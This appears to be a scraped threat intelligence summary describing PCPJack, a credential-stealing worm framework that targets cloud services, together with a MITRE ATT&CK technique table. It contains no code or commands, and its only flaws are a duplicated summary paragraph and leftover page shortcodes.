EXECUTIVE SUMMARY
A notorious threat actor persona, TeamPCP, has been linked to a credential theft framework known as PCPJack, which is designed to worm across exposed cloud infrastructure and remove artifacts associated with TeamPCP. The framework, attributed to a single actor or group familiar with TeamPCP's tooling, targets a broad range of services, including Docker, Kubernetes, Redis, MongoDB, and vulnerable web applications. The attacker's primary goal appears to be monetization through credential theft, fraud, spam, extortion, or resale of stolen access.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
A notorious threat actor persona, TeamPCP, has been linked to a credential theft framework known as PCPJack, which is designed to worm across exposed cloud infrastructure and remove artifacts associated with TeamPCP. The framework, attributed to a single actor or group familiar with TeamPCP's tooling, targets a broad range of services, including Docker, Kubernetes, Redis, MongoDB, and vulnerable web applications. The attacker's primary goal appears to be monetization through credential theft, fraud, spam, extortion, or resale of stolen access.[emaillocker id="1283"]
PCPJack's infection process begins with a shell script called bootstrap.sh, which sets up the environment, downloads additional payloads, and removes processes or artifacts associated with TeamPCP. The framework uses a Python virtual environment to install required modules, including a worm that spreads to additional hosts through lateral movement and exploitation of vulnerabilities in web technologies. The attacker maintains control through a Telegram bot, which receives commands and posts data to a channel. The framework's design is modular, making it harder to analyze in isolation, and it uses encryption to protect sensitive data.
The PCPJack framework poses a significant threat to organizations, particularly those with cloud-based infrastructure, as it can spread undetected and steal sensitive information, including environment variables, SSH private keys, and cryptocurrency wallets. The attacker's use of a credential theft framework, combined with their focus on removing TeamPCP's services, suggests a high level of sophistication and a willingness to adapt and evolve their tactics. To defend against these threats, organizations should adhere to cloud and web application security best practices, including credential management, authentication mechanisms, and secure configuration of services like Docker and Kubernetes.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1190 | Exploit Public-Facing Application | — |
| Execution | T1059.004 | Command and Scripting Interpreter | Unix Shell |
| Persistence | T1543.002 | Create or Modify System Process | Systemd Service |
| Persistence | T1053.003 | Scheduled Task/Job | Cron |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Credential Access | T1552.001 | Unsecured Credentials | Credentials In Files |
| Credential Access | T1212 | Exploitation for Credential Access | — |
| Discovery | T1613 | Container and Resource Discovery | — |
| Lateral Movement | T1210 | Exploitation of Remote Services | — |
| Initial Access | T1078 | Valid Accounts | — |
MBC MAPPING:No MBC Mapping content found in HTML.
REFERENCES:
reports contain further technical details:
[/emaillocker]